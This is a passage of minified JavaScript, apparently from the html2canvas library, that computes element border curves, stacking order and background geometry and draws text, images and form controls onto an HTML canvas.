ge=ce.styles,_e=ce.bounds,je=wo(ge.borderTopLeftRadius,_e.width,_e.height),tt=je[0],dt=je[1],_t=wo(ge.borderTopRightRadius,_e.width,_e.height),gt=_t[0],kt=_t[1],Lt=wo(ge.borderBottomRightRadius,_e.width,_e.height),Ht=Lt[0],ui=Lt[1],Ki=wo(ge.borderBottomLeftRadius,_e.width,_e.height),Ni=Ki[0],Ui=Ki[1],dn=[];dn.push((tt+gt)/_e.width),dn.push((Ni+Ht)/_e.width),dn.push((dt+Ui)/_e.height),dn.push((kt+ui)/_e.height);var ta=Math.max.apply(Math,dn);ta>1&&(tt/=ta,dt/=ta,gt/=ta,kt/=ta,Ht/=ta,ui/=ta,Ni/=ta,Ui/=ta);var na=_e.width-gt,To=_e.height-ui,Mn=_e.width-Ht,qa=_e.height-Ui,Qi=ge.borderTopWidth,ro=ge.borderRightWidth,Yn=ge.borderBottomWidth,Ka=ge.borderLeftWidth,Sr=_n(ge.paddingTop,ce.bounds.width),Uc=_n(ge.paddingRight,ce.bounds.width),qc=_n(ge.paddingBottom,ce.bounds.width),On=_n(ge.paddingLeft,ce.bounds.width);this.topLeftBorderDoubleOuterBox=tt>0||dt>0?hr(_e.left+Ka/3,_e.top+Qi/3,tt-Ka/3,dt-Qi/3,Io.TOP_LEFT):new Fi(_e.left+Ka/3,_e.top+Qi/3),this.topRightBorderDoubleOuterBox=tt>0||dt>0?hr(_e.left+na,_e.top+Qi/3,gt-ro/3,kt-Qi/3,Io.TOP_RIGHT):new Fi(_e.left+_e.width-ro/3,_e.top+Qi/3),this.bottomRightBorderDoubleOuterBox=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht-ro/3,ui-Yn/3,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-ro/3,_e.top+_e.height-Yn/3),this.bottomLeftBorderDoubleOuterBox=Ni>0||Ui>0?hr(_e.left+Ka/3,_e.top+qa,Ni-Ka/3,Ui-Yn/3,Io.BOTTOM_LEFT):new Fi(_e.left+Ka/3,_e.top+_e.height-Yn/3),this.topLeftBorderDoubleInnerBox=tt>0||dt>0?hr(_e.left+2*Ka/3,_e.top+2*Qi/3,tt-2*Ka/3,dt-2*Qi/3,Io.TOP_LEFT):new Fi(_e.left+2*Ka/3,_e.top+2*Qi/3),this.topRightBorderDoubleInnerBox=tt>0||dt>0?hr(_e.left+na,_e.top+2*Qi/3,gt-2*ro/3,kt-2*Qi/3,Io.TOP_RIGHT):new Fi(_e.left+_e.width-2*ro/3,_e.top+2*Qi/3),this.bottomRightBorderDoubleInnerBox=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht-2*ro/3,ui-2*Yn/3,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-2*ro/3,_e.top+_e.height-2*Yn/3),this.bottomLeftBorderDoubleInnerBox=Ni>0||Ui>0?hr(_e.left+2*Ka/3,_e.top+qa,Ni-2*Ka/3,Ui-2*Yn/3,Io.BOTTOM_LEFT):new Fi(_e.left+2*Ka/3,_e.top+_e.height-2*Yn/3),this.topLeftBorderStroke=tt>0||dt>0?hr(_e.left+Ka/2,_e.top+Qi/2,tt-Ka/2,dt-Qi/2,Io.TOP_LEFT):new Fi(_e.left+Ka/2,_e.top+Qi/2),this.topRightBorderStroke=tt>0||dt>0?hr(_e.left+na,_e.top+Qi/2,gt-ro/2,kt-Qi/2,Io.TOP_RIGHT):new Fi(_e.left+_e.width-ro/2,_e.top+Qi/2),this.bottomRightBorderStroke=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht-ro/2,ui-Yn/2,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-ro/2,_e.top+_e.height-Yn/2),this.bottomLeftBorderStroke=Ni>0||Ui>0?hr(_e.left+Ka/2,_e.top+qa,Ni-Ka/2,Ui-Yn/2,Io.BOTTOM_LEFT):new Fi(_e.left+Ka/2,_e.top+_e.height-Yn/2),this.topLeftBorderBox=tt>0||dt>0?hr(_e.left,_e.top,tt,dt,Io.TOP_LEFT):new Fi(_e.left,_e.top),this.topRightBorderBox=gt>0||kt>0?hr(_e.left+na,_e.top,gt,kt,Io.TOP_RIGHT):new Fi(_e.left+_e.width,_e.top),this.bottomRightBorderBox=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht,ui,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width,_e.top+_e.height),this.bottomLeftBorderBox=Ni>0||Ui>0?hr(_e.left,_e.top+qa,Ni,Ui,Io.BOTTOM_LEFT):new Fi(_e.left,_e.top+_e.height),this.topLeftPaddingBox=tt>0||dt>0?hr(_e.left+Ka,_e.top+Qi,Math.max(0,tt-Ka),Math.max(0,dt-Qi),Io.TOP_LEFT):new Fi(_e.left+Ka,_e.top+Qi),this.topRightPaddingBox=gt>0||kt>0?hr(_e.left+Math.min(na,_e.width-ro),_e.top+Qi,na>_e.width+ro?0:Math.max(0,gt-ro),Math.max(0,kt-Qi),Io.TOP_RIGHT):new Fi(_e.left+_e.width-ro,_e.top+Qi),this.bottomRightPaddingBox=Ht>0||ui>0?hr(_e.left+Math.min(Mn,_e.width-Ka),_e.top+Math.min(To,_e.height-Yn),Math.max(0,Ht-ro),Math.max(0,ui-Yn),Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-ro,_e.top+_e.height-Yn),this.bottomLeftPaddingBox=Ni>0||Ui>0?hr(_e.left+Ka,_e.top+Math.min(qa,_e.height-Yn),Math.max(0,Ni-Ka),Math.max(0,Ui-Yn),Io.BOTTOM_LEFT):new Fi(_e.left+Ka,_e.top+_e.height-Yn),this.topLeftContentBox=tt>0||dt>0?hr(_e.left+Ka+On,_e.top+Qi+Sr,Math.max(0,tt-(Ka+On)),Math.max(0,dt-(Qi+Sr)),Io.TOP_LEFT):new Fi(_e.left+Ka+On,_e.top+Qi+Sr),this.topRightContentBox=gt>0||kt>0?hr(_e.left+Math.min(na,_e.width+Ka+On),_e.top+Qi+Sr,na>_e.width+Ka+On?0:gt-Ka+On,kt-(Qi+Sr),Io.TOP_RIGHT):new Fi(_e.left+_e.width-(ro+Uc),_e.top+Qi+Sr),this.bottomRightContentBox=Ht>0||ui>0?hr(_e.left+Math.min(Mn,_e.width-(Ka+On)),_e.top+Math.min(To,_e.height+Qi+Sr),Math.max(0,Ht-(ro+Uc)),ui-(Yn+qc),Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-(ro+Uc),_e.top+_e.height-(Yn+qc)),this.bottomLeftContentBox=Ni>0||Ui>0?hr(_e.left+Ka+On,_e.top+qa,Math.max(0,Ni-(Ka+On)),Ui-(Yn+qc),Io.BOTTOM_LEFT):new Fi(_e.left+Ka+On,_e.top+_e.height-(Yn+qc))},Io=(()=>{return(fe=Io||(Io={}))[fe.TOP_LEFT=0]="TOP_LEFT",fe[fe.TOP_RIGHT=1]="TOP_RIGHT",fe[fe.BOTTOM_RIGHT=2]="BOTTOM_RIGHT",fe[fe.BOTTOM_LEFT=3]="BOTTOM_LEFT",Io;var fe})(),hr=function(fe,ce,ge,_e,je){var tt=(Math.sqrt(2)-1)/3*4,dt=ge*tt,_t=_e*tt,gt=fe+ge,kt=ce+_e;switch(je){case Io.TOP_LEFT:return new W0(new Fi(fe,kt),new Fi(fe,kt-_t),new Fi(gt-dt,ce),new Fi(gt,ce));case Io.TOP_RIGHT:return new W0(new Fi(fe,ce),new Fi(fe+dt,ce),new Fi(gt,kt-_t),new Fi(gt,kt));case Io.BOTTOM_RIGHT:return new W0(new Fi(gt,ce),new Fi(gt,ce+_t),new Fi(fe+dt,kt),new Fi(fe,kt));default:return new W0(new Fi(gt,kt),new Fi(gt-dt,kt),new Fi(fe,ce+_t),new Fi(fe,ce))}},q_=function(fe){return[fe.topLeftBorderBox,fe.topRightBorderBox,fe.bottomRightBorderBox,fe.bottomLeftBorderBox]},F0=function(fe){return[fe.topLeftPaddingBox,fe.topRightPaddingBox,fe.bottomRightPaddingBox,fe.bottomLeftPaddingBox]},dE=function fe(ce,ge,_e){this.offsetX=ce,this.offsetY=ge,this.matrix=_e,this.type=0,this.target=6},V0=function fe(ce,ge){this.path=ce,this.target=ge,this.type=1},B0=function fe(ce){this.opacity=ce,this.type=2,this.target=6},Gf=function(fe){return 1===fe.type},SC=function(fe,ce){return fe.length===ce.length&&fe.some(function(ge,_e){return ge===ce[_e]})},mE=function fe(ce){this.element=ce,this.inlineLevel=[],this.nonInlineLevel=[],this.negativeZIndex=[],this.zeroOrAutoZIndexOrTransformedOrOpacity=[],this.positiveZIndex=[],this.nonPositionedFloats=[],this.nonPositionedInlineLevel=[]},uE=function(){function fe(ce,ge){if(this.container=ce,this.parent=ge,this.effects=[],this.curves=new cE(this.container),this.container.styles.opacity<1&&this.effects.push(new B0(this.container.styles.opacity)),null!==this.container.styles.transform&&this.effects.push(new dE(this.container.bounds.left+this.container.styles.transformOrigin[0].number,this.container.bounds.top+this.container.styles.transformOrigin[1].number,this.container.styles.transform)),0!==this.container.styles.overflowX){var dt=q_(this.curves),_t=F0(this.curves);SC(dt,_t)?this.effects.push(new V0(dt,6)):(this.effects.push(new V0(dt,2)),this.effects.push(new V0(_t,4)))}}return fe.prototype.getEffects=function(ce){for(var ge=-1===[2,3].indexOf(this.container.styles.position),_e=this.parent,je=this.effects.slice(0);_e;){var tt=_e.effects.filter(function(gt){return!Gf(gt)});if(ge||0!==_e.container.styles.position||!_e.parent){if(je.unshift.apply(je,tt),ge=-1===[2,3].indexOf(_e.container.styles.position),0!==_e.container.styles.overflowX){var dt=q_(_e.curves),_t=F0(_e.curves);SC(dt,_t)||je.unshift(new V0(_t,6))}}else je.unshift.apply(je,tt);_e=_e.parent}return je.filter(function(gt){return Tr(gt.target,ce)})},fe}(),ZM=function(fe,ce,ge,_e){fe.container.elements.forEach(function(je){var tt=Tr(je.flags,4),dt=Tr(je.flags,2),_t=new uE(je,fe);Tr(je.styles.display,2048)&&_e.push(_t);var gt=Tr(je.flags,8)?[]:_e;if(tt||dt){var kt=tt||je.styles.isPositioned()?ge:ce,Lt=new mE(_t);if(je.styles.isPositioned()||je.styles.opacity<1||je.styles.isTransformed()){var Ht=je.styles.zIndex.order;if(Ht<0){var ui=0;kt.negativeZIndex.some(function(Ni,Ui){return Ht>Ni.element.container.styles.zIndex.order?(ui=Ui,!1):ui>0}),kt.negativeZIndex.splice(ui,0,Lt)}else if(Ht>0){var Ki=0;kt.positiveZIndex.some(function(Ni,Ui){return Ht>=Ni.element.container.styles.zIndex.order?(Ki=Ui+1,!1):Ki>0}),kt.positiveZIndex.splice(Ki,0,Lt)}else kt.zeroOrAutoZIndexOrTransformedOrOpacity.push(Lt)}else je.styles.isFloating()?kt.nonPositionedFloats.push(Lt):kt.nonPositionedInlineLevel.push(Lt);ZM(_t,Lt,tt?Lt:ge,gt)}else je.styles.isInlineLevel()?ce.inlineLevel.push(_t):ce.nonInlineLevel.push(_t),ZM(_t,ce,ge,gt);Tr(je.flags,8)&&H0(je,gt)})},H0=function(fe,ce){for(var ge=fe instanceof Zm?fe.start:1,_e=fe instanceof Zm&&fe.reversed,je=0;je<ce.length;je++){var tt=ce[je];tt.container instanceof ud&&"number"==typeof tt.container.value&&0!==tt.container.value&&(ge=tt.container.value),tt.listValue=B_(ge,tt.container.styles.listStyleType,!0),ge+=_e?-1:1}},hE=function(fe,ce){switch(ce){case 0:return vl(fe.topLeftBorderBox,fe.topLeftPaddingBox,fe.topRightBorderBox,fe.topRightPaddingBox);case 1:return vl(fe.topRightBorderBox,fe.topRightPaddingBox,fe.bottomRightBorderBox,fe.bottomRightPaddingBox);case 2:return vl(fe.bottomRightBorderBox,fe.bottomRightPaddingBox,fe.bottomLeftBorderBox,fe.bottomLeftPaddingBox);default:return vl(fe.bottomLeftBorderBox,fe.bottomLeftPaddingBox,fe.topLeftBorderBox,fe.topLeftPaddingBox)}},U0=function(fe,ce){var ge=[];return Ml(fe)?ge.push(fe.subdivide(.5,!1)):ge.push(fe),Ml(ce)?ge.push(ce.subdivide(.5,!0)):ge.push(ce),ge},vl=function(fe,ce,ge,_e){var je=[];return Ml(fe)?je.push(fe.subdivide(.5,!1)):je.push(fe),Ml(ge)?je.push(ge.subdivide(.5,!0)):je.push(ge),Ml(_e)?je.push(_e.subdivide(.5,!0).reverse()):je.push(_e),Ml(ce)?je.push(ce.subdivide(.5,!1).reverse()):je.push(ce),je},tv=function(fe){var ge=fe.styles;return fe.bounds.add(ge.borderLeftWidth,ge.borderTopWidth,-(ge.borderRightWidth+ge.borderLeftWidth),-(ge.borderTopWidth+ge.borderBottomWidth))},G_=function(fe){var ce=fe.styles,ge=fe.bounds,_e=_n(ce.paddingLeft,ge.width),je=_n(ce.paddingRight,ge.width),tt=_n(ce.paddingTop,ge.width),dt=_n(ce.paddingBottom,ge.width);return ge.add(_e+ce.borderLeftWidth,tt+ce.borderTopWidth,-(ce.borderRightWidth+ce.borderLeftWidth+_e+je),-(ce.borderTopWidth+ce.borderBottomWidth+tt+dt))},j_=function(fe,ce,ge){var _e=function(fe,ce){return 0===fe?ce.bounds:2===fe?G_(ce):tv(ce)}(Qf(fe.styles.backgroundOrigin,ce),fe),je=function(fe,ce){return 0===fe?ce.bounds:2===fe?G_(ce):tv(ce)}(Qf(fe.styles.backgroundClip,ce),fe),tt=Hc(Qf(fe.styles.backgroundSize,ce),ge,_e),dt=tt[0],_t=tt[1],gt=wo(Qf(fe.styles.backgroundPosition,ce),_e.width-dt,_e.height-_t);return[nm(Qf(fe.styles.backgroundRepeat,ce),gt,tt,_e,je),Math.round(_e.left+gt[0]),Math.round(_e.top+gt[1]),dt,_t]},jf=function(fe){return tn(fe)&&fe.value===sa.AUTO},oo=function(fe){return"number"==typeof fe},Hc=function(fe,ce,ge){var _e=ce[0],je=ce[1],tt=ce[2],dt=fe[0],_t=fe[1];if(!dt)return[0,0];if(In(dt)&&_t&&In(_t))return[_n(dt,ge.width),_n(_t,ge.height)];var gt=oo(tt);if(tn(dt)&&(dt.value===sa.CONTAIN||dt.value===sa.COVER))return oo(tt)?ge.width/ge.height<tt!=(dt.value===sa.COVER)?[ge.width,ge.width/tt]:[ge.height*tt,ge.height]:[ge.width,ge.height];var Lt=oo(_e),Ht=oo(je),ui=Lt||Ht;if(jf(dt)&&(!_t||jf(_t)))return Lt&&Ht?[_e,je]:gt||ui?ui&&gt?[Lt?_e:je*tt,Ht?je:_e/tt]:[Lt?_e:ge.width,Ht?je:ge.height]:[ge.width,ge.height];if(gt){var ta=0,na=0;return In(dt)?ta=_n(dt,ge.width):In(_t)&&(na=_n(_t,ge.height)),jf(dt)?ta=na*tt:(!_t||jf(_t))&&(na=ta/tt),[ta,na]}var To=null,Mn=null;if(In(dt)?To=_n(dt,ge.width):_t&&In(_t)&&(Mn=_n(_t,ge.height)),null!==To&&(!_t||jf(_t))&&(Mn=Lt&&Ht?To/_e*je:ge.height),null!==Mn&&jf(dt)&&(To=Lt&&Ht?Mn/je*_e:ge.width),null!==To&&null!==Mn)return[To,Mn];throw new Error("Unable to calculate background-size for element")},Qf=function(fe,ce){var ge=fe[ce];return void 0===ge?fe[0]:ge},nm=function(fe,ce,ge,_e,je){var tt=ce[0],dt=ce[1],_t=ge[0],gt=ge[1];switch(fe){case 2:return[new Fi(Math.round(_e.left),Math.round(_e.top+dt)),new Fi(Math.round(_e.left+_e.width),Math.round(_e.top+dt)),new Fi(Math.round(_e.left+_e.width),Math.round(gt+_e.top+dt)),new Fi(Math.round(_e.left),Math.round(gt+_e.top+dt))];case 3:return[new Fi(Math.round(_e.left+tt),Math.round(_e.top)),new Fi(Math.round(_e.left+tt+_t),Math.round(_e.top)),new Fi(Math.round(_e.left+tt+_t),Math.round(_e.height+_e.top)),new Fi(Math.round(_e.left+tt),Math.round(_e.height+_e.top))];case 1:return[new Fi(Math.round(_e.left+tt),Math.round(_e.top+dt)),new Fi(Math.round(_e.left+tt+_t),Math.round(_e.top+dt)),new Fi(Math.round(_e.left+tt+_t),Math.round(_e.top+dt+gt)),new Fi(Math.round(_e.left+tt),Math.round(_e.top+dt+gt))];default:return[new Fi(Math.round(je.left),Math.round(je.top)),new Fi(Math.round(je.left+je.width),Math.round(je.top)),new Fi(Math.round(je.left+je.width),Math.round(je.height+je.top)),new Fi(Math.round(je.left),Math.round(je.height+je.top))]}},av="Hidden Text",pE=function(){function fe(ce){this._data={},this._document=ce}return fe.prototype.parseMetrics=function(ce,ge){var _e=this._document.createElement("div"),je=this._document.createElement("img"),tt=this._document.createElement("span"),dt=this._document.body;_e.style.visibility="hidden",_e.style.fontFamily=ce,_e.style.fontSize=ge,_e.style.margin="0",_e.style.padding="0",_e.style.whiteSpace="nowrap",dt.appendChild(_e),je.src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7",je.width=1,je.height=1,je.style.margin="0",je.style.padding="0",je.style.verticalAlign="baseline",tt.style.fontFamily=ce,tt.style.fontSize=ge,tt.style.margin="0",tt.style.padding="0",tt.appendChild(this._document.createTextNode(av)),_e.appendChild(tt),_e.appendChild(je);var _t=je.offsetTop-tt.offsetTop+2;_e.removeChild(tt),_e.appendChild(this._document.createTextNode(av)),_e.style.lineHeight="normal",je.style.verticalAlign="super";var gt=je.offsetTop-_e.offsetTop+2;return dt.removeChild(_e),{baseline:_t,middle:gt}},fe.prototype.getMetrics=function(ce,ge){var _e=ce+" "+ge;return void 0===this._data[_e]&&(this._data[_e]=this.parseMetrics(ce,ge)),this._data[_e]},fe}(),nv=function fe(ce,ge){this.context=ce,this.options=ge},gE=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je._activeEffects=[],je.canvas=_e.canvas?_e.canvas:document.createElement("canvas"),je.ctx=je.canvas.getContext("2d"),_e.canvas||(je.canvas.width=Math.floor(_e.width*_e.scale),je.canvas.height=Math.floor(_e.height*_e.scale),je.canvas.style.width=_e.width+"px",je.canvas.style.height=_e.height+"px"),je.fontMetrics=new pE(document),je.ctx.scale(je.options.scale,je.options.scale),je.ctx.translate(-_e.x,-_e.y),je.ctx.textBaseline="bottom",je._activeEffects=[],je.context.logger.debug("Canvas renderer initialized ("+_e.width+"x"+_e.height+") with scale "+_e.scale),je}return de(ce,fe),ce.prototype.applyEffects=function(ge){for(var _e=this;this._activeEffects.length;)this.popEffect();ge.forEach(function(je){return _e.applyEffect(je)})},ce.prototype.applyEffect=function(ge){this.ctx.save(),function(fe){return 2===fe.type}(ge)&&(this.ctx.globalAlpha=ge.opacity),function(fe){return 0===fe.type}(ge)&&(this.ctx.translate(ge.offsetX,ge.offsetY),this.ctx.transform(ge.matrix[0],ge.matrix[1],ge.matrix[2],ge.matrix[3],ge.matrix[4],ge.matrix[5]),this.ctx.translate(-ge.offsetX,-ge.offsetY)),Gf(ge)&&(this.path(ge.path),this.ctx.clip()),this._activeEffects.push(ge)},ce.prototype.popEffect=function(){this._activeEffects.pop(),this.ctx.restore()},ce.prototype.renderStack=function(ge){return j(this,void 0,void 0,function(){return $(this,function(je){switch(je.label){case 0:return ge.element.container.styles.isVisible()?[4,this.renderStackContent(ge)]:[3,2];case 1:je.sent(),je.label=2;case 2:return[2]}})})},ce.prototype.renderNode=function(ge){return j(this,void 0,void 0,function(){return $(this,function(_e){switch(_e.label){case 0:return Tr(ge.container.flags,16),ge.container.styles.isVisible()?[4,this.renderNodeBackgroundAndBorders(ge)]:[3,3];case 1:return _e.sent(),[4,this.renderNodeContent(ge)];case 2:_e.sent(),_e.label=3;case 3:return[2]}})})},ce.prototype.renderTextWithLetterSpacing=function(ge,_e,je){var tt=this;0===_e?this.ctx.fillText(ge.text,ge.bounds.left,ge.bounds.top+je):im(ge.text).reduce(function(_t,gt){return tt.ctx.fillText(gt,_t,ge.bounds.top+je),_t+tt.ctx.measureText(gt).width},ge.bounds.left)},ce.prototype.createFontStyle=function(ge){var _e=ge.fontVariant.filter(function(dt){return"normal"===dt||"small-caps"===dt}).join(""),je=ov(ge.fontFamily).join(", "),tt=Un(ge.fontSize)?""+ge.fontSize.number+ge.fontSize.unit:ge.fontSize.number+"px";return[[ge.fontStyle,_e,ge.fontWeight,tt,je].join(" "),je,tt]},ce.prototype.renderTextNode=function(ge,_e){return j(this,void 0,void 0,function(){var je,dt,_t,gt,kt,Lt,Ht,ui=this;return $(this,function(Ki){return je=this.createFontStyle(_e),dt=je[1],_t=je[2],this.ctx.font=je[0],this.ctx.direction=1===_e.direction?"rtl":"ltr",this.ctx.textAlign="left",this.ctx.textBaseline="alphabetic",gt=this.fontMetrics.getMetrics(dt,_t),kt=gt.baseline,Lt=gt.middle,Ht=_e.paintOrder,ge.textBounds.forEach(function(Ni){Ht.forEach(function(Ui){switch(Ui){case 0:ui.ctx.fillStyle=er(_e.color),ui.renderTextWithLetterSpacing(Ni,_e.letterSpacing,kt);var dn=_e.textShadow;dn.length&&Ni.text.trim().length&&(dn.slice(0).reverse().forEach(function(ta){ui.ctx.shadowColor=er(ta.color),ui.ctx.shadowOffsetX=ta.offsetX.number*ui.options.scale,ui.ctx.shadowOffsetY=ta.offsetY.number*ui.options.scale,ui.ctx.shadowBlur=ta.blur.number,ui.renderTextWithLetterSpacing(Ni,_e.letterSpacing,kt)}),ui.ctx.shadowColor="",ui.ctx.shadowOffsetX=0,ui.ctx.shadowOffsetY=0,ui.ctx.shadowBlur=0),_e.textDecorationLine.length&&(ui.ctx.fillStyle=er(_e.textDecorationColor||_e.color),_e.textDecorationLine.forEach(function(ta){switch(ta){case 1:ui.ctx.fillRect(Ni.bounds.left,Math.round(Ni.bounds.top+kt),Ni.bounds.width,1);break;case 2:ui.ctx.fillRect(Ni.bounds.left,Math.round(Ni.bounds.top),Ni.bounds.width,1);break;case 3:ui.ctx.fillRect(Ni.bounds.left,Math.ceil(Ni.bounds.top+Lt),Ni.bounds.width,1)}}));break;case 1:_e.webkitTextStrokeWidth&&Ni.text.trim().length&&(ui.ctx.strokeStyle=er(_e.webkitTextStrokeColor),ui.ctx.lineWidth=_e.webkitTextStrokeWidth,ui.ctx.lineJoin=window.chrome?"miter":"round",ui.ctx.strokeText(Ni.text,Ni.bounds.left,Ni.bounds.top+kt)),ui.ctx.strokeStyle="",ui.ctx.lineWidth=0,ui.ctx.lineJoin="miter"}})}),[2]})})},ce.prototype.renderReplacedElement=function(ge,_e,je){if(je&&ge.intrinsicWidth>0&&ge.intrinsicHeight>0){var tt=G_(ge),dt=F0(_e);this.path(dt),this.ctx.save(),this.ctx.clip(),this.ctx.drawImage(je,0,0,ge.intrinsicWidth,ge.intrinsicHeight,tt.left,tt.top,tt.width,tt.height),this.ctx.restore()}},ce.prototype.renderNodeContent=function(ge){return j(this,void 0,void 0,function(){var _e,je,tt,dt,_t,Lt,Ht,ui,Ni,Ui,dn,ta,na,To,Mn,qa;return $(this,function(Qi){switch(Qi.label){case 0:this.applyEffects(ge.getEffects(4)),je=ge.curves,tt=(_e=ge.container).styles,dt=0,_t=_e.textNodes,Qi.label=1;case 1:return dt<_t.length?[4,this.renderTextNode(_t[dt],tt)]:[3,4];case 2:Qi.sent(),Qi.label=3;case 3:return dt++,[3,1];case 4:if(!(_e instanceof zc))return[3,8];Qi.label=5;case 5:return Qi.trys.push([5,7,,8]),[4,this.context.cache.match(_e.src)];case 6:return na=Qi.sent(),this.renderReplacedElement(_e,je,na),[3,8];case 7:return Qi.sent(),this.context.logger.error("Error loading image "+_e.src),[3,8];case 8:if(_e instanceof O_&&this.renderReplacedElement(_e,je,_e.canvas),!(_e instanceof rh))return[3,12];Qi.label=9;case 9:return Qi.trys.push([9,11,,12]),[4,this.context.cache.match(_e.svg)];case 10:return na=Qi.sent(),this.renderReplacedElement(_e,je,na),[3,12];case 11:return Qi.sent(),this.context.logger.error("Error loading svg "+_e.svg.substring(0,255)),[3,12];case 12:return _e instanceof lh&&_e.tree?[4,new ce(this.context,{scale:this.options.scale,backgroundColor:_e.backgroundColor,x:0,y:0,width:_e.width,height:_e.height}).render(_e.tree)]:[3,14];case 13:Lt=Qi.sent(),_e.width&&_e.height&&this.ctx.drawImage(Lt,0,0,_e.width,_e.height,_e.bounds.left,_e.bounds.top,_e.bounds.width,_e.bounds.height),Qi.label=14;case 14:if(_e instanceof z_&&(Ht=Math.min(_e.bounds.width,_e.bounds.height),_e.type===sh?_e.checked&&(this.ctx.save(),this.path([new Fi(_e.bounds.left+.39363*Ht,_e.bounds.top+.79*Ht),new Fi(_e.bounds.left+.16*Ht,_e.bounds.top+.5549*Ht),new Fi(_e.bounds.left+.27347*Ht,_e.bounds.top+.44071*Ht),new Fi(_e.bounds.left+.39694*Ht,_e.bounds.top+.5649*Ht),new Fi(_e.bounds.left+.72983*Ht,_e.bounds.top+.23*Ht),new Fi(_e.bounds.left+.84*Ht,_e.bounds.top+.34085*Ht),new Fi(_e.bounds.left+.39363*Ht,_e.bounds.top+.79*Ht)]),this.ctx.fillStyle=er(yl),this.ctx.fill(),this.ctx.restore()):_e.type===ps&&_e.checked&&(this.ctx.save(),this.ctx.beginPath(),this.ctx.arc(_e.bounds.left+Ht/2,_e.bounds.top+Ht/2,Ht/4,0,2*Math.PI,!0),this.ctx.fillStyle=er(yl),this.ctx.fill(),this.ctx.restore())),V7(_e)&&_e.value.length){switch(ui=this.createFontStyle(tt),Ni=this.fontMetrics.getMetrics(Mn=ui[0],ui[1]).baseline,this.ctx.font=Mn,this.ctx.fillStyle=er(tt.color),this.ctx.textBaseline="alphabetic",this.ctx.textAlign=Q_(_e.styles.textAlign),qa=G_(_e),Ui=0,_e.styles.textAlign){case 1:Ui+=qa.width/2;break;case 2:Ui+=qa.width}dn=qa.add(Ui,0,0,-qa.height/2+1),this.ctx.save(),this.path([new Fi(qa.left,qa.top),new Fi(qa.left+qa.width,qa.top),new Fi(qa.left+qa.width,qa.top+qa.height),new Fi(qa.left,qa.top+qa.height)]),this.ctx.clip(),this.renderTextWithLetterSpacing(new Vf(_e.value,dn),tt.letterSpacing,Ni),this.ctx.restore(),this.ctx.textBaseline="alphabetic",this.ctx.textAlign="left"}if(!Tr(_e.styles.display,2048))return[3,20];if(null===_e.styles.listStyleImage)return[3,19];if(0!==(ta=_e.styles.listStyleImage).type)return[3,18];na=void 0,To=ta.url,Qi.label=15;case 15:return Qi.trys.push([15,17,,18]),[4,this.context.cache.match(To)];case 16:return na=Qi.sent(),this.ctx.drawImage(na,_e.bounds.left-(na.width+10),_e.bounds.top),[3,18];case 17:return Qi.sent(),this.context.logger.error("Error loading list-style-image "+To),[3,18];case 18:return[3,20];case 19:ge.listValue&&-1!==_e.styles.listStyleType&&(Mn=this.createFontStyle(tt)[0],this.ctx.font=Mn,this.ctx.fillStyle=er(tt.color),this.ctx.textBaseline="middle",this.ctx.textAlign="right",qa=new I(_e.bounds.left,_e.bounds.top+_n(_e.styles.paddingTop,_e.bounds.width),_e.bounds.width,tC(tt.lineHeight,tt.fontSize.number)/2+1),this.renderTextWithLetterSpacing(new Vf(ge.listValue,qa),tt.letterSpacing,tC(tt.lineHeight,tt.fontSize.number)/2+2),this.ctx.textBaseline="bottom",this.ctx.textAlign="left"),Qi.label=20;case 20:return[2]}})})},ce.prototype.renderStackContent=function(ge){return j(this,void 0,void 0,function(){var _e,je,tt,dt,_t,gt,kt,Lt,Ht,ui,Ki,Ni,Ui,dn;return $(this,function(na){switch(na.label){case 0:return Tr(ge.element.container.flags,16),[4,this.renderNodeBackgroundAndBorders(ge.element)];case 1:na.sent(),_e=0,je=ge.negativeZIndex,na.label=2;case 2:return _e<je.length?[4,this.renderStack(je[_e])]:[3,5];case 3:na.sent(),na.label=4;case 4:return _e++,[3,2];case 5:return[4,this.renderNodeContent(ge.element)];case 6:na.sent(),tt=0,dt=ge.nonInlineLevel,na.label=7;case 7:return tt<dt.length?[4,this.renderNode(dt[tt])]:[3,10];case 8:na.sent(),na.label=9;case 9:return tt++,[3,7];case 10:_t=0,gt=ge.nonPositionedFloats,na.label=11;case 11:return _t<gt.length?[4,this.renderStack(gt[_t])]:[3,14];case 12:na.sent(),na.label=13;case 13:return _t++,[3,11];case 14:kt=0,Lt=ge.nonPositionedInlineLevel,na.label=15;case 15:return kt<Lt.length?[4,this.renderStack(Lt[kt])]:[3,18];case 16:na.sent(),na.label=17;case 17:return kt++,[3,15];case 18:Ht=0,ui=ge.inlineLevel,na.label=19;case 19:return Ht<ui.length?[4,this.renderNode(ui[Ht])]:[3,22];case 20:na.sent(),na.label=21;case 21:return Ht++,[3,19];case 22:Ki=0,Ni=ge.zeroOrAutoZIndexOrTransformedOrOpacity,na.label=23;case 23:return Ki<Ni.length?[4,this.renderStack(Ni[Ki])]:[3,26];case 24:na.sent(),na.label=25;case 25:return Ki++,[3,23];case 26:Ui=0,dn=ge.positiveZIndex,na.label=27;case 27:return Ui<dn.length?[4,this.renderStack(dn[Ui])]:[3,30];case 28:na.sent(),na.label=29;case 29:return Ui++,[3,27];case 30:return[2]}})})},ce.prototype.mask=function(ge){this.ctx.beginPath(),this.ctx.moveTo(0,0),this.ctx.lineTo(this.canvas.width,0),this.ctx.lineTo(this.canvas.width,this.canvas.height),this.ctx.lineTo(0,this.canvas.height),this.ctx.lineTo(0,0),this.formatPath(ge.slice(0).reverse()),this.ctx.closePath()},ce.prototype.path=function(ge){this.ctx.beginPath(),this.formatPath(ge),this.ctx.closePath()},ce.prototype.formatPath=function(ge){var _e=this;ge.forEach(function(je,tt){var 